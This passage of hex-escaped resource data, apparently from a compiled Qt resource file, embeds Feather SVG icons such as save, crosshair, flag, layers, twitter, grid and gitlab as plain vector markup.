\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x39\x20\x32\x31\
\x48\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\
\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\
\x68\x31\x31\x6c\x35\x20\x35\x76\x31\x31\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x31\x2d\x32\x20\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x31\x37\x20\x32\x31\x20\x31\x37\x20\x31\x33\x20\
\x37\x20\x31\x33\x20\x37\x20\x32\x31\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x37\x20\x33\x20\x37\x20\x38\x20\
\x31\x35\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x75\x70\x2d\x72\x69\x67\x68\x74\x22\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x37\x22\x20\x79\x31\x3d\x22\x31\x37\x22\x20\
\x78\x32\x3d\x22\x31\x37\x22\x20\x79\x32\x3d\x22\x37\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x37\x20\x37\x20\x31\x37\x20\x37\
\x20\x31\x37\x20\x31\x37\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x6b\x69\x70\x2d\
\x66\x6f\x72\x77\x61\x72\x64\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\
\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x35\x20\x34\x20\x31\x35\
\x20\x31\x32\x20\x35\x20\x32\x30\x20\x35\x20\x34\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x31\x39\x22\x20\x79\x31\x3d\x22\x35\x22\x20\x78\x32\x3d\
\x22\x31\x39\x22\x20\x79\x32\x3d\x22\x31\x39\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x4c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x6d\x61\x72\x74\
\x70\x68\x6f\x6e\x65\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\
\x35\x22\x20\x79\x3d\x22\x32\x22\x20\x77\x69\x64\x74\x68\x3d\x22\
\x31\x34\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x30\x22\x20\
\x72\x78\x3d\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\
\x72\x65\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x32\x22\x20\x79\x31\x3d\x22\x31\x38\x22\x20\x78\x32\x3d\x22\x31\
\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xb5\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x72\x6f\x73\x73\
\x68\x61\x69\x72\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\
\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\
\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x32\x22\x20\x79\x31\x3d\x22\
\x31\x32\x22\x20\x78\x32\x3d\x22\x31\x38\x22\x20\x79\x32\x3d\x22\
\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x36\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\
\x78\x32\x3d\x22\x32\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x31\x32\x22\x20\x79\x31\x3d\x22\x36\x22\x20\x78\x32\x3d\x22\x31\
\x32\x22\x20\x79\x32\x3d\x22\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\
\x31\x3d\x22\x32\x32\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\
\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x4e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x6c\x61\x67\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x31\x35\x73\
\x31\x2d\x31\x20\x34\x2d\x31\x20\x35\x20\x32\x20\x38\x20\x32\x20\
\x34\x2d\x31\x20\x34\x2d\x31\x56\x33\x73\x2d\x31\x20\x31\x2d\x34\
\x20\x31\x2d\x35\x2d\x32\x2d\x38\x2d\x32\x2d\x34\x20\x31\x2d\x34\
\x20\x31\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x34\x22\x20\x79\x31\x3d\x22\x32\x32\x22\
\x20\x78\x32\x3d\x22\x34\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x6d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x61\x79\x65\x72\
\x73\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x31\x32\x20\x32\x20\x32\x20\x37\x20\x31\x32\x20\
\x31\x32\x20\x32\x32\x20\x37\x20\x31\x32\x20\x32\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x20\x31\x37\x20\x31\
\x32\x20\x32\x32\x20\x32\x32\x20\x31\x37\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x20\x31\x32\x20\x31\x32\
\x20\x31\x37\x20\x32\x32\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x48\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x61\x62\x6c\x65\
\x74\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x34\x22\x20\x79\
\x3d\x22\x32\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\x22\x20\
\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x30\x22\x20\x72\x78\x3d\x22\
\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\
\x31\x3d\x22\x31\x38\x22\x20\x78\x32\x3d\x22\x31\x32\x2e\x30\x31\
\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x98\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x77\x69\x74\x74\
\x65\x72\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x33\
\x20\x33\x61\x31\x30\x2e\x39\x20\x31\x30\x2e\x39\x20\x30\x20\x30\
\x20\x31\x2d\x33\x2e\x31\x34\x20\x31\x2e\x35\x33\x20\x34\x2e\x34\
\x38\x20\x34\x2e\x34\x38\x20\x30\x20\x30\x20\x30\x2d\x37\x2e\x38\
\x36\x20\x33\x76\x31\x41\x31\x30\x2e\x36\x36\x20\x31\x30\x2e\x36\
\x36\x20\x30\x20\x30\x20\x31\x20\x33\x20\x34\x73\x2d\x34\x20\x39\
\x20\x35\x20\x31\x33\x61\x31\x31\x2e\x36\x34\x20\x31\x31\x2e\x36\
\x34\x20\x30\x20\x30\x20\x31\x2d\x37\x20\x32\x63\x39\x20\x35\x20\
\x32\x30\x20\x30\x20\x32\x30\x2d\x31\x31\x2e\x35\x61\x34\x2e\x35\
\x20\x34\x2e\x35\x20\x30\x20\x30\x20\x30\x2d\x2e\x30\x38\x2d\x2e\
\x38\x33\x41\x37\x2e\x37\x32\x20\x37\x2e\x37\x32\x20\x30\x20\x30\
\x20\x30\x20\x32\x33\x20\x33\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x94\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x67\x72\x69\x64\x22\
\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\x79\x3d\x22\
\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x37\x22\x20\x68\x65\x69\
\x67\x68\x74\x3d\x22\x37\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\
\x72\x65\x63\x74\x20\x78\x3d\x22\x31\x34\x22\x20\x79\x3d\x22\x33\
\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x37\x22\x20\x68\x65\x69\x67\
\x68\x74\x3d\x22\x37\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x72\
\x65\x63\x74\x20\x78\x3d\x22\x31\x34\x22\x20\x79\x3d\x22\x31\x34\
\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x37\x22\x20\x68\x65\x69\x67\
\x68\x74\x3d\x22\x37\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x72\
\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\x79\x3d\x22\x31\x34\x22\
\x20\x77\x69\x64\x74\x68\x3d\x22\x37\x22\x20\x68\x65\x69\x67\x68\
\x74\x3d\x22\x37\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x60\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x79\x70\x65\x22\
\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\
\x73\x3d\x22\x34\x20\x37\x20\x34\x20\x34\x20\x32\x30\x20\x34\x20\
\x32\x30\x20\x37\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\x20\x79\x31\
\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\x31\x35\x22\x20\x79\x32\
\x3d\x22\x32\x30\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x34\
\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x32\x30\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x29\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x68\x65\x72\x6d\
\x6f\x6d\x65\x74\x65\x72\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\
\x22\x4d\x31\x34\x20\x31\x34\x2e\x37\x36\x56\x33\x2e\x35\x61\x32\
\x2e\x35\x20\x32\x2e\x35\x20\x30\x20\x30\x20\x30\x2d\x35\x20\x30\
\x76\x31\x31\x2e\x32\x36\x61\x34\x2e\x35\x20\x34\x2e\x35\x20\x30\
\x20\x31\x20\x30\x20\x35\x20\x30\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xea\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x67\x69\x74\x6c\x61\
\x62\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x32\x2e\
\x36\x35\x20\x31\x34\x2e\x33\x39\x4c\x31\x32\x20\x32\x32\x2e\x31\
\x33\x20\x31\x2e\x33\x35\x20\x31\x34\x2e\x33\x39\x61\x2e\x38\x34\
\x2e\x38\x34\x20\x30\x20\x30\x20\x31\x2d\x2e\x33\x2d\x2e\x39\x34\
